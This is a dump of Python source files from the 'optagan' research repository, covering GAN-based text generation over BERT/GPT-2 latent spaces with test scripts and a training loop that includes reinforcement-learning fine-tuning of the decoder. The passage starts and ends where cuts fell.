import torch.nn.functional as F
from tqdm import tqdm, trange
from func import GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig, BertConfig
from func import GPT2LMHeadModel, GPT2Tokenizer, GPT2ForLatentConnector, GPT2ForLatentConnectorValueHead
from func import OpenAIGPTLMHeadModel, OpenAIGPTTokenizer
from func import XLNetLMHeadModel, XLNetTokenizer
from func import TransfoXLLMHeadModel, TransfoXLTokenizer
from func import BertForLatentConnector, BertTokenizer
from collections import defaultdict
import pdb
from modules.utils import rollout_test
MAX_LENGTH = int(10000) # Hardcoded max length to avoid infinite loop
ALL_MODELS = sum((tuple(conf.pretrained_config_archive_map.keys()) for conf in (GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig)), ())
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
MODEL_CLASSES = {
'gpt2': (GPT2Config, GPT2ForLatentConnector, GPT2Tokenizer),
'bert': (BertConfig, BertForLatentConnector, BertTokenizer),
'gpt2v': (GPT2Config, GPT2ForLatentConnectorValueHead, GPT2Tokenizer)
}
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--new_sent', type=int, default=1, help="Number of sentences to generate")
parser.add_argument('--n_layers', type=int, default=20, help="Number of layers of generator")
parser.add_argument('--block_dim', type=int, default=100)
parser.add_argument('--interval', type=int, default=10)
parser.add_argument('--cuda', type=bool, default=torch.cuda.is_available())
parser.add_argument('--generator_dir', default=None, type=str, required=True, help="Directory of GAN model checkpoint")
parser.add_argument("--checkpoint_dir", default=None, type=str, required=True,
help="The directory where checkpoints are saved.")
parser.add_argument("--output_dir", default=None, type=str, required=True,
help="The output directory where the model predictions and checkpoints will be written.")
parser.add_argument("--save", default=False, type=bool, help="Save results to file.")
parser.add_argument("--latent_size", default=32, type=int, help="Latent space dimension.")
parser.add_argument("--output_name", default="results", type=str, help="File name of output")
parser.add_argument("--batch_size", default=100, type=int, help="Batch size to generate outputs")
## Encoder options
parser.add_argument("--encoder_model_type", default="bert", type=str,
help="The encoder model architecture to be fine-tuned.")
parser.add_argument("--encoder_model_name_or_path", default="bert-base-cased", type=str,
help="The encoder model checkpoint for weights initialization.")
parser.add_argument("--encoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--encoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
## Decoder options
parser.add_argument("--decoder_model_type", default="gpt2", type=str,
help="The decoder model architecture to be fine-tuned.")
parser.add_argument("--decoder_model_name_or_path", default="gpt2", type=str,
help="The decoder model checkpoint for weights initialization.")
parser.add_argument("--decoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--decoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
parser.add_argument("--max_seq_length", default=512, type=int,
help="Optional input sequence length before tokenization. The sequence will be dropped if it is longer the max_seq_length")
parser.add_argument("--finetune_decoder", default=False, type=bool,
help="Uses finetuned decoder in output dir if true.")
## Variational auto-encoder(check this)
parser.add_argument("--top_k", type=int, default=0)
parser.add_argument("--top_p", type=float, default=1.0)
parser.add_argument("--prompt", type=str, default="")
parser.add_argument("--padding_text", type=str, default="")
parser.add_argument("--length", type=int, default=20)
parser.add_argument("--block_size", default=-1, type=int,
help="Optional input sequence length after tokenization."
"The training dataset will be truncated in block of this size for training."
"Default to the model max input length for single sentence inputs (take into account special tokens).")
parser.add_argument("--do_lower_case", action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--use_philly", action='store_true',
help="Use Philly for computing.")
parser.add_argument('--gloabl_step_eval', type=int, default=508523,
help="Evaluate the results at the given global step")
# Load a trained Encoder model and vocabulary that you have fine-tuned
args = parser.parse_args()
global_step = args.gloabl_step_eval
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.backends.cudnn.deterministic = True
args.device = torch.device("cuda" if args.cuda else "cpu")
args.n_gpu = torch.cuda.device_count()
if args.n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
args.encoder_model_type = args.encoder_model_type.lower()
args.decoder_model_type = args.decoder_model_type.lower()
output_encoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-encoder-{}'.format(global_step))
output_decoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-decoder-{}'.format(global_step))
if not args.finetune_decoder:
output_decoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-decoder-{}'.format(global_step))
else:
output_decoder_dir = os.path.join(args.output_dir, 'checkpoint-decoder-{}'.format(global_step))
checkpoints = [ [output_encoder_dir, output_decoder_dir] ]
# Load a trained Encoder model and vocabulary that you have fine-tuned
encoder_config_class, encoder_model_class, encoder_tokenizer_class = MODEL_CLASSES[args.encoder_model_type]
model_encoder = encoder_model_class.from_pretrained(output_encoder_dir, latent_size=args.latent_size)
tokenizer_encoder = encoder_tokenizer_class.from_pretrained(args.encoder_tokenizer_name if args.encoder_tokenizer_name else args.encoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_encoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_encoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_encoder.max_len_single_sentence)
# Load a trained Decoder model and vocabulary that you have fine-tuned
if not args.finetune_decoder:
decoder_config_class, decoder_model_class, decoder_tokenizer_class = MODEL_CLASSES[args.decoder_model_type]
else:
decoder_config_class, decoder_model_class, decoder_tokenizer_class = MODEL_CLASSES["gpt2v"]
model_decoder = decoder_model_class.from_pretrained(output_decoder_dir, latent_size=args.latent_size)
tokenizer_decoder = decoder_tokenizer_class.from_pretrained(args.decoder_tokenizer_name if args.decoder_tokenizer_name else args.decoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_decoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_decoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_decoder.max_len_single_sentence)
# Chunyuan: Add Padding token to GPT2
special_tokens_dict = {'pad_token': '<PAD>', 'bos_token': '<BOS>', 'eos_token': '<EOS>'}
num_added_toks = tokenizer_decoder.add_special_tokens(special_tokens_dict)
logger.info('We have added {} tokens to GPT2'.format(num_added_toks))
model_decoder.resize_token_embeddings(len(tokenizer_decoder)) # Notice: resize_token_embeddings expect to receive the full size of the new vocabulary, i.e. the length of the tokenizer.
assert tokenizer_decoder.pad_token == '<PAD>'
generator = Generator(args.n_layers, args.block_dim, args.latent_size)
if args.cuda:
generator = generator.cuda()
generator.load_state_dict(torch.load(args.generator_dir+'/generator_'+str(args.gloabl_step_eval)+'.th'))
generator.eval()
model_decoder.eval()
model_encoder.eval()
if args.save:
if not os.path.exists(args.output_dir+"/{}.txt".format(args.output_name)):
with open(args.output_dir+"/{}.txt".format(args.output_name), 'w'):
pass
for i in range(int(args.new_sent/args.batch_size)):
# sample noise
noise = torch.Tensor(np.random.normal(0, 1, (args.batch_size, args.latent_size))).to(args.device)
new_z = generator(noise).data
# create new sent
sents = rollout_test(model_decoder, new_z, tokenizer_decoder, args.max_seq_length, args.batch_size, args.top_k, args.top_p)
if args.save:
with open(args.output_dir+"/{}.txt".format(args.output_name), 'a') as file:
for i in sents:
file.write(i+"\n")
else:
for i in sents:
logger.info(i)
| [] |
2024-01-10 | Egojr/optagan | optagan~cond_test.py | from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import logging
import torch
import torch.nn as nn
import numpy as np
from modules.gan import cond_Generator
import glob
import os
import pickle
import random
import torch.nn.functional as F
from tqdm import tqdm, trange
from func import GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig, BertConfig
from func import GPT2LMHeadModel, GPT2Tokenizer, GPT2ForLatentConnector, GPT2ForLatentConnectorValueHead
from func import OpenAIGPTLMHeadModel, OpenAIGPTTokenizer
from func import XLNetLMHeadModel, XLNetTokenizer
from func import TransfoXLLMHeadModel, TransfoXLTokenizer
from func import BertForLatentConnector, BertTokenizer
from collections import defaultdict
import pdb
from modules.utils import rollout_test
MAX_LENGTH = int(10000) # Hardcoded max length to avoid infinite loop
ALL_MODELS = sum((tuple(conf.pretrained_config_archive_map.keys()) for conf in (GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig)), ())
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
MODEL_CLASSES = {
'gpt2': (GPT2Config, GPT2ForLatentConnector, GPT2Tokenizer),
'bert': (BertConfig, BertForLatentConnector, BertTokenizer),
'gpt2v': (GPT2Config, GPT2ForLatentConnectorValueHead, GPT2Tokenizer)
}
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--new_sent', type=int, default=1, help="Number of sentences to generate")
parser.add_argument('--n_layers', type=int, default=20, help="Number of layers of generator")
parser.add_argument('--block_dim', type=int, default=100)
parser.add_argument('--interval', type=int, default=10)
parser.add_argument('--cuda', type=bool, default=torch.cuda.is_available())
parser.add_argument('--n_classes', type=int, default=4, help="Overall number of classes")
parser.add_argument('--generate_label', type=str, default="all", help="Either all for all labels, or number of label to generate")
parser.add_argument('--generator_dir', default=None, type=str, required=True, help="Directory of GAN model checkpoint")
parser.add_argument("--checkpoint_dir", default=None, type=str, required=True,
help="The directory where checkpoints are saved.")
parser.add_argument("--output_dir", default=None, type=str, required=True,
help="The output directory where the model predictions and checkpoints will be written.")
parser.add_argument("--save", default=False, type=bool, help="Save results to file.")
parser.add_argument("--latent_size", default=32, type=int, help="Latent space dimension.")
parser.add_argument("--output_name", default="results", type=str, help="File name of output")
parser.add_argument("--batch_size", default=100, type=int, help="Batch size to generate outputs")
## Encoder options
parser.add_argument("--encoder_model_type", default="bert", type=str,
help="The encoder model architecture to be fine-tuned.")
parser.add_argument("--encoder_model_name_or_path", default="bert-base-cased", type=str,
help="The encoder model checkpoint for weights initialization.")
parser.add_argument("--encoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--encoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
## Decoder options
parser.add_argument("--decoder_model_type", default="gpt2", type=str,
help="The decoder model architecture to be fine-tuned.")
parser.add_argument("--decoder_model_name_or_path", default="bert-base-cased", type=str,
help="The decoder model checkpoint for weights initialization.")
parser.add_argument("--decoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--decoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
parser.add_argument("--max_seq_length", default=512, type=int,
help="Optional input sequence length before tokenization. The sequence will be dropped if it is longer the max_seq_length")
parser.add_argument("--finetune_decoder", default=False, type=bool,
help="Uses finetuned decoder in output dir if true.")
## Variational auto-encoder(check this)
parser.add_argument("--temperature", type=float, default=1.0)
parser.add_argument("--top_k", type=int, default=0)
parser.add_argument("--top_p", type=float, default=1.0)
parser.add_argument("--prompt", type=str, default="")
parser.add_argument("--padding_text", type=str, default="")
parser.add_argument("--length", type=int, default=20)
parser.add_argument("--block_size", default=-1, type=int,
help="Optional input sequence length after tokenization."
"The training dataset will be truncated in block of this size for training."
"Default to the model max input length for single sentence inputs (take into account special tokens).")
parser.add_argument("--do_lower_case", action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--use_philly", action='store_true',
help="Use Philly for computing.")
parser.add_argument('--gloabl_step_eval', type=int, default=661,
help="Evaluate the results at the given global step")
# Load a trained Encoder model and vocabulary that you have fine-tuned
args = parser.parse_args()
global_step = args.gloabl_step_eval
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.backends.cudnn.deterministic = True
args.device = torch.device("cuda" if args.cuda else "cpu")
args.n_gpu = torch.cuda.device_count()
if args.n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
args.encoder_model_type = args.encoder_model_type.lower()
args.decoder_model_type = args.decoder_model_type.lower()
output_encoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-encoder-{}'.format(global_step))
if not args.finetune_decoder:
output_decoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-decoder-{}'.format(global_step))
else:
output_decoder_dir = os.path.join(args.output_dir, 'checkpoint-decoder-{}'.format(global_step))
checkpoints = [ [output_encoder_dir, output_decoder_dir] ]
# Load a trained Encoder model and vocabulary that you have fine-tuned
encoder_config_class, encoder_model_class, encoder_tokenizer_class = MODEL_CLASSES[args.encoder_model_type]
model_encoder = encoder_model_class.from_pretrained(output_encoder_dir, latent_size=args.latent_size)
tokenizer_encoder = encoder_tokenizer_class.from_pretrained(args.encoder_tokenizer_name if args.encoder_tokenizer_name else args.encoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_encoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_encoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_encoder.max_len_single_sentence)
# Load a trained Decoder model and vocabulary that you have fine-tuned
if not args.finetune_decoder:
decoder_config_class, decoder_model_class, decoder_tokenizer_class = MODEL_CLASSES[args.decoder_model_type]
else:
decoder_config_class, decoder_model_class, decoder_tokenizer_class = MODEL_CLASSES["gpt2v"]
model_decoder = decoder_model_class.from_pretrained(output_decoder_dir, latent_size=args.latent_size)
tokenizer_decoder = decoder_tokenizer_class.from_pretrained(args.decoder_tokenizer_name if args.decoder_tokenizer_name else args.decoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_decoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_decoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_decoder.max_len_single_sentence)
# Chunyuan: Add Padding token to GPT2
special_tokens_dict = {'pad_token': '<PAD>', 'bos_token': '<BOS>', 'eos_token': '<EOS>'}
num_added_toks = tokenizer_decoder.add_special_tokens(special_tokens_dict)
logger.info('We have added {} tokens to GPT2'.format(num_added_toks))
model_decoder.resize_token_embeddings(len(tokenizer_decoder)) # Notice: resize_token_embeddings expect to receive the full size of the new vocabulary, i.e. the length of the tokenizer.
assert tokenizer_decoder.pad_token == '<PAD>'
generator = cond_Generator(args.n_layers, args.block_dim, args.latent_size, args.n_classes)
if args.cuda:
generator = generator.to(args.device)
generator.load_state_dict(torch.load(args.generator_dir+'/generator_'+str(args.gloabl_step_eval)+'.th', map_location=torch.device(args.device)))
generator.eval()
model_decoder.eval()
model_encoder.eval()
if args.save:
if not os.path.exists(args.output_dir+"/{}.txt".format(args.output_name)):
with open(args.output_dir+"/{}.txt".format(args.output_name), 'w'):
pass
# generate based on label input
if args.generate_label == "all":
classes_lab = args.new_sent/args.n_classes
label = list()
for i in range(0, args.n_classes):
label.extend([i] * int(classes_lab))
label = torch.LongTensor(label).to(args.device)
else:
label = list()
label.extend(args.new_sent * [int(args.generate_label)])
label = torch.LongTensor(label).to(args.device)
# Get number of generation iterations
for i in range(0, int(args.new_sent/args.batch_size)):
# sample noise
noise = torch.Tensor(np.random.normal(0, 1, (args.batch_size, args.latent_size))).to(args.device)
new_z = generator(noise, label[i*args.batch_size:args.batch_size*(i+1)]).data
# create new sent
sents = rollout_test(model_decoder, new_z, tokenizer_decoder, args.max_seq_length, args.batch_size, args.top_k, args.top_p)
sents = [str(lab)+" "+str(sen) for lab,sen in zip(label.tolist()[i*args.batch_size:args.batch_size*(i+1)], sents)]
if args.save:
with open(args.output_dir+"/{}.txt".format(args.output_name), 'a') as file:
for i in sents:
file.write(i+"\n")
else:
for i in sents:
logger.info(i)
| [] |
2024-01-10 | Egojr/optagan | optagan~optagan.py | from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import logging
import torch
import torch.nn as nn
import torch.optim as optim
import torch.autograd as autograd
import numpy as np
from torch.autograd import Variable
from modules.gan import Generator, Critic
import copy
import math
import glob
import os
import pickle
import random
import torch.nn.functional as F
from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler, TensorDataset
from torch.utils.data.distributed import DistributedSampler
from tqdm import tqdm, trange
from func import GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig, BertConfig
from func import GPT2LMHeadModel, GPT2Tokenizer, GPT2ForLatentConnector, GPT2ForLatentConnectorValueHead
from func import OpenAIGPTLMHeadModel, OpenAIGPTTokenizer
from func import XLNetLMHeadModel, XLNetTokenizer
from func import TransfoXLLMHeadModel, TransfoXLTokenizer
from func import BertForLatentConnector, BertTokenizer
from collections import defaultdict
from utils import (TextDataset_Split, TextDataset_2Tokenizers, BucketingDataLoader)
import pdb
from modules.utils import (calc_blue_parallel_func, pad_seq, rollout, rollout_test)
from transformers.modeling_utils import top_k_top_p_filtering
MAX_LENGTH = int(10000) # Hardcoded max length to avoid infinite loop
ALL_MODELS = sum((tuple(conf.pretrained_config_archive_map.keys()) for conf in (GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig)), ())
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
MODEL_CLASSES = {
'gpt2': (GPT2Config, GPT2ForLatentConnectorValueHead, GPT2Tokenizer),
'bert': (BertConfig, BertForLatentConnector, BertTokenizer)
}
def load_and_cache_examples(args, tokenizer):
if isinstance(tokenizer, list):
dataset = TextDataset_2Tokenizers(tokenizer, args, args.train_data_file, block_size=args.block_size)
else:
dataset = TextDataset_Split(tokenizer, args, args.train_data_file, block_size=args.block_size)
return dataset
def build_dataload_and_cache_examples(args, tokenizer):
if isinstance(tokenizer, list):
args.batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
file_path=args.train_data_file
dataloader = BucketingDataLoader(file_path, args.batch_size, args.max_seq_length, tokenizer, args, bucket=100, shuffle=True)
else:
pass
return dataloader
def compute_grad_penalty(critic, real_data, fake_data):
B = real_data.size(0)
alpha = torch.FloatTensor(np.random.random((B, 1)))
if args.cuda:
alpha = alpha.cuda()
sample = alpha*real_data + (1-alpha)*fake_data
sample.requires_grad_(True)
score = critic(sample)
outputs = torch.FloatTensor(B, 1).fill_(1.0) #args.latent_size
outputs.requires_grad_(False)
if args.cuda:
outputs = outputs.cuda()
grads = autograd.grad(
outputs=score,
inputs=sample,
grad_outputs=outputs,
create_graph=True,
retain_graph=True,
only_inputs=True)[0]
grad_penalty = ((grads.norm(2, dim=1) - 1.) ** 2).mean()
return grad_penalty
def train(epoch):
model_encoder.eval()
model_decoder.eval()
generator.train()
critic.train()
c_train_loss = 0.
g_train_loss = 0.
g_batches = 0
c_batches = 0
c_loss_0 = 1
g_loss_0 = 1
for i, x in enumerate(train_loader):
x = x[0]
if args.cuda:
x = x.cuda()
# Generate noise
B = args.per_gpu_train_batch_size
noise = torch.from_numpy(np.random.normal(0, 1, (B,
args.latent_size))).float()
if args.cuda:
noise = noise.cuda()
# Get original text latent embeddings
with torch.no_grad():
pooled_hidden_fea = model_encoder(x, attention_mask=(x > 0).float())[1]
mean, logvar = model_encoder.linear(pooled_hidden_fea).chunk(2, -1)
z_real = mean.squeeze(1)
# Evaluate and get losses
z_fake = generator(noise)
real_score = critic(z_real)
fake_score = critic(z_fake)
grad_penalty = compute_grad_penalty(critic, z_real.data, z_fake.data)
c_loss = -torch.mean(real_score) + torch.mean(fake_score) + \
args.gp_lambda*grad_penalty
fake_score = critic(generator(noise))
g_loss = -torch.mean(fake_score)
r_g = abs(((g_loss.item() - g_loss_0) / (g_loss_0 + 0.001)))
r_c = abs(((c_loss.item() - c_loss_0) / (c_loss_0 + 0.001)))
# Update critic or generator
if ((2 + epoch) / epoch) * r_c > r_g:
c_optimizer.zero_grad()
c_batches += 1
c_train_loss += c_loss.item()
c_loss.backward()
c_optimizer.step()
else:
g_optimizer.zero_grad()
g_batches += 1
g_train_loss += g_loss.item()
g_loss.backward()
g_optimizer.step()
c_loss_0 = c_loss.item()
g_loss_0 = g_loss.item()
if args.interval > 0 and i % args.interval == 0:
logger.info('Epoch: {} | Batch: {}/{} ({:.0f}%) | G Loss: {:.6f} | C Loss: {:.6f}'.format(
epoch, args.batch_size*i, len(train_loader.dataset),
100.*(args.batch_size*i)/len(train_loader.dataset),
g_loss.item(), c_loss.item()
))
test_noise = torch.Tensor(np.random.normal(0, 1, (1, args.latent_size))).to(args.device)
test_new_z = generator(test_noise).data
# create new sent
test_z = rollout_test(model_decoder, test_new_z, tokenizer_decoder, args.max_seq_length, 1, 0, 1)
logger.info("Text: {}".format(test_z))
c_train_loss /= c_batches + 1
g_train_loss /= g_batches + 1
logger.info('* (Train) Epoch: {} | G Loss: {:.4f} | C Loss: {:.4f} | Updates G: {} | Updates C: {}'.format(
epoch, g_train_loss, c_train_loss, g_batches, c_batches
))
return (g_train_loss, c_train_loss)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--epochs', type=int, default=15)
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--gp_lambda', type=int, default=10)
parser.add_argument('--n_layers', type=int, default=20, help="Number of layers of generator and critic")
parser.add_argument('--block_dim', type=int, default=100)
parser.add_argument('--interval', type=int, default=10, help="Steps before logging output")
parser.add_argument('--cuda', type=bool, default=torch.cuda.is_available())
# Optimus parameters
parser.add_argument("--train_data_file", default=None, type=str, required=True,
help="The input training data file (a text file).")
parser.add_argument("--valid_data_file", default=None, type=str, required=True,
help="The input validation data file (a text file).")
parser.add_argument("--checkpoint_dir", default=None, type=str, required=True,
help="The directory where checkpoints are saved.")
parser.add_argument('--generator_dir', default=None, type=str, help="Directory where GAN models are saved")
parser.add_argument("--output_dir", default=None, type=str, required=True,
help="The output directory where the model predictions and checkpoints will be written.")
parser.add_argument("--dataset", default='Snli', type=str, help="The dataset.")
parser.add_argument("--latent_size", default=32, type=int, help="Latent space dimension.")
## Encoder options
parser.add_argument("--encoder_model_type", default="bert", type=str,
help="The encoder model architecture to be fine-tuned.")
parser.add_argument("--encoder_model_name_or_path", default="bert-base-cased", type=str,
help="The encoder model checkpoint for weights initialization.")
parser.add_argument("--encoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--encoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
## Decoder options
parser.add_argument("--decoder_model_type", default="gpt2", type=str,
help="The decoder model architecture to be fine-tuned.")
parser.add_argument("--decoder_model_name_or_path", default="bert-base-cased", type=str,
help="The decoder model checkpoint for weights initialization.")
parser.add_argument("--decoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--decoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
parser.add_argument("--per_gpu_train_batch_size", default=1, type=int,
help="Batch size per GPU/CPU for training.")
parser.add_argument("--max_seq_length", default=512, type=int,
help="Optional input sequence length before tokenization. The sequence will be dropped if it is longer the max_seq_length")
## Variational auto-encoder(check this)
parser.add_argument("--prompt", type=str, default="")
parser.add_argument("--padding_text", type=str, default="")
parser.add_argument("--length", type=int, default=20)
parser.add_argument("--block_size", default=-1, type=int,
help="Optional input sequence length after tokenization."
"The training dataset will be truncated in block of this size for training."
"Default to the model max input length for single sentence inputs (take into account special tokens).")
parser.add_argument("--do_lower_case", action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--use_philly", action='store_true',
help="Use Philly for computing.")
parser.add_argument('--gloabl_step_eval', type=int, default=661,
help="Evaluate the results at the given global step")
# Reinforcement learning parameters
parser.add_argument('--finetune_decoder', type=bool, default=True)
parser.add_argument('--epochs_rl', type=int, default=1000)
parser.add_argument('--batch_size_rl', type=int, default=32)
parser.add_argument('--lr_rl', type=float, default=1e-6)
# Load a trained Encoder model and vocabulary that you have fine-tuned
args = parser.parse_args()
global_step = args.gloabl_step_eval
torch.backends.cudnn.deterministic = True
args.device = torch.device("cuda" if args.cuda else "cpu")
args.n_gpu = torch.cuda.device_count()
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
args.encoder_model_type = args.encoder_model_type.lower()
args.decoder_model_type = args.decoder_model_type.lower()
output_encoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-encoder-{}'.format(global_step))
output_decoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-decoder-{}'.format(global_step))
checkpoints = [ [output_encoder_dir, output_decoder_dir] ]
# Load a trained Encoder model and vocabulary that you have fine-tuned
encoder_config_class, encoder_model_class, encoder_tokenizer_class = MODEL_CLASSES[args.encoder_model_type]
model_encoder = encoder_model_class.from_pretrained(output_encoder_dir, latent_size=args.latent_size)
tokenizer_encoder = encoder_tokenizer_class.from_pretrained(args.encoder_tokenizer_name if args.encoder_tokenizer_name else args.encoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_encoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_encoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_encoder.max_len_single_sentence)
# Load a trained Decoder model and vocabulary that you have fine-tuned
decoder_config_class, decoder_model_class, decoder_tokenizer_class = MODEL_CLASSES[args.decoder_model_type]
model_decoder = decoder_model_class.from_pretrained(output_decoder_dir, latent_size=args.latent_size)
tokenizer_decoder = decoder_tokenizer_class.from_pretrained(args.decoder_tokenizer_name if args.decoder_tokenizer_name else args.decoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_decoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_decoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_decoder.max_len_single_sentence)
# Chunyuan: Add Padding token to GPT2
special_tokens_dict = {'pad_token': '<PAD>', 'bos_token': '<BOS>', 'eos_token': '<EOS>'}
num_added_toks = tokenizer_decoder.add_special_tokens(special_tokens_dict)
logger.info('We have added {} tokens to GPT2'.format(num_added_toks))
model_decoder.resize_token_embeddings(len(tokenizer_decoder)) # Notice: resize_token_embeddings expect to receive the full size of the new vocabulary, i.e. the length of the tokenizer.
assert tokenizer_decoder.pad_token == '<PAD>'
train_loader = build_dataload_and_cache_examples(args, [tokenizer_encoder, tokenizer_decoder])
generator = Generator(args.n_layers, args.block_dim,args.latent_size)
critic = Critic(args.n_layers, args.block_dim,args.latent_size)
if args.generator_dir!=None:
logger.info("Loading generator and critic")
generator.load_state_dict(torch.load(args.generator_dir+'/generator_'+str(args.gloabl_step_eval)+'.th'))
critic.load_state_dict(torch.load(args.generator_dir+'/critic_'+str(args.gloabl_step_eval)+'.th'))
g_optimizer = optim.Adam(generator.parameters(), lr=args.lr, betas=(0.5, 0.999))
c_optimizer = optim.Adam(critic.parameters(), lr=args.lr, betas=(0.5, 0.999))
if args.cuda:
generator = generator.cuda()
critic = critic.cuda()
logger.info('G Parameters:{}'.format(sum([p.numel() for p in generator.parameters() if \
p.requires_grad])))
logger.info('C Parameters:{}'.format(sum([p.numel() for p in critic.parameters() if \
p.requires_grad])))
best_bleu = 0
reference = list()
with(open(args.valid_data_file,"r")) as valid:
for sents in valid:
reference.append(sents.replace("\n", ""))
for epoch in range(1, args.epochs + 1):
g_loss, c_loss = train(epoch)
data_test = list()
for i in range(2):
test_noise = torch.Tensor(np.random.normal(0, 1, (250, args.latent_size))).to(args.device)
test_z = generator(test_noise).data
new_sent = rollout_test(model_decoder, test_z, tokenizer_decoder, args.max_seq_length, 250, 0, 1)
data_test.extend(new_sent)
p_reference = random.sample(reference, 500)
bleu = calc_blue_parallel_func(p_reference, data_test, 2, 500)
b_bleu = calc_blue_parallel_func(data_test, p_reference, 2, 500)
logger.info("Bleu-2:{:0.3f} | B-Bleu-2:{:0.3f}".format(bleu, b_bleu))
if (bleu+b_bleu) > best_bleu:
best_bleu = bleu + b_bleu
logger.info('* Saving. Best Score:{:0.3f} | Bleu-2:{:0.3f} | B-Bleu-2:{:0.3f}'.format(best_bleu, bleu, b_bleu))
torch.save(generator.state_dict(), args.output_dir+'/generator_'+str(args.gloabl_step_eval)+'.th')
torch.save(critic.state_dict(), args.output_dir+'/critic_'+str(args.gloabl_step_eval)+'.th')
if args.finetune_decoder:
logger.info("Loading generator")
generator.load_state_dict(torch.load(args.output_dir+'/generator_'+str(args.gloabl_step_eval)+'.th'))
model_decoder.train()
generator.eval()
dec_optimizer = optim.Adam(model_decoder.parameters(), lr=1e-4, betas=(0.5, 0.999))
value_loss = nn.L1Loss()
B = args.batch_size_rl
total_scores = 0
total_entropy = 0
total_values = 0
total_v_loss = 0
for epoch_ in range(args.epochs_rl):
if epoch_ == 200:
# Finetune decoder after training of value head
dec_optimizer = optim.Adam(model_decoder.parameters(), lr=args.lr_rl, betas=(0.5, 0.999))
noise = torch.from_numpy(np.random.normal(0, 1, (B, args.latent_size))).float()
noise = noise.to(args.device)
z_fake = generator(noise)
sents, logprobs, values, entropy = rollout(model_decoder, z_fake, tokenizer_decoder, args.max_seq_length, B, 1)
p_reference = random.sample(reference, 500)
blue = []
for i in sents:
blue.append(calc_blue_parallel_func(p_reference, [i], 1, 0))
values = torch.stack(values, dim=1)
logprobs = torch.stack(logprobs, dim=1)
entropy = torch.stack(entropy, dim=1)
# Get tokens and mask of batch
toks_gpt = [([50258] + tokenizer_decoder.encode(j) + [50259]) for j in sents]
